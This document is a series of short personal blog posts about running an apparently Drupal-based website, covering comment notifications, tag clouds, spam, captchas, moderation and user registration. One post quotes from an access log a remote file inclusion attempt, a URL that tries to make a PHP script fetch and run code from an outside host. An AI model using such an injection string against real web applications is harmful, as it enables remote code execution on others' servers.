My website

Comment notifications changed

I've replaced the comment_subscribe module that was responsible for comment notification mails up til now. Since it was barely used, I did not bother to convert the contents of the old notification table into the new table structure that is used by the comment_notify module. Sorry for any inconvenience.

Tags

Here're _all_ the tags assigned to the various posts on my site. I've organized them into a tagcloud weighted by the number of nodes the tags are assigned to.

Topics

I'm sure Dries doesn't mind if I borrow his tagclouds. Smiling The following lists contain the top 60 tags that I've already used in my posts. The font sizes mark the significance of the given tag in the given context. Eg. a tag with a larger font size in the "What people read about" tagcloud has been read more times by visitors, than the tags with smaller font sizes.

Take a look at this page if you're interested in creating similiar tagclouds on your Drupal-based website.

Top visitors

It just happened that I took a look at the logs of my website and clicked on the "Top visitors" page too. It's quite interesting IMHO ... Smiling

Comment moderation

Due to the recent increase of comment spam on my site (despite of the captcha protection!), I was forced to enable comment moderation. Thus new comments do not appear automatically after being submitted, they go into a moderation queue so I can filter out spam before it hits the front page.

Comment spam

Yesterday I found the first spam among the comments of one of my posts. I'm quite happy that it took over 1.5 years to get the first spam ... which can probably be attributed to the captcha protection that I have set up some time ago. Smiling I love the world of open source. Laughing out loud

Disabled user registration

I've made the decision to disable user registration on my site. There were only a couple of visitors who decided to register, but 99% of them never logged in. A user is only useful if you intend to come back regularly and post comments since this way you don't have to enter your user info and captcha validation for every comment (which are compulsory for anonymous users - aka. casual visitors). I also removed already existing users with the exception of those, who have logged in at least once this year and not just on the day of their user's registration.

Week try :->

I found in the access log the following URL: /*.php?include=http://home.arcor.de/xdhdev/xdh.txt. Is there any webserver that would execute some arbitrary code this way? Shocked Anyway ... the referred url (xdh.txt) gives a HTTP 404 not found error ... Laughing out loud

Captchas to allow anonymous comments :-)

I've installed the Captcha and Textimage modules so I can allow anonymous comments and prevent comment spam at the same time. Smiling Now you can post comments without registration.

Amazing discovery ... :-D

I recently took a look at the list of registered users of my site and found that there truely are some people visiting this place. Smiling However I do not really know why they registered (except for the very few who added comments to some posts)? Shocked Registration does not bring any advantages/services/etc. with it. One of the users even uploaded a small picture to her user profile. Smiling

Currently the only way of interaction is adding comments to my posts and this is available for anonymous visitors, too. This is quite a restriction so I considered adding a forum (in Drupal this is just a few clicks), where registered users can add questions/topics not related to any of my posts. Smiling
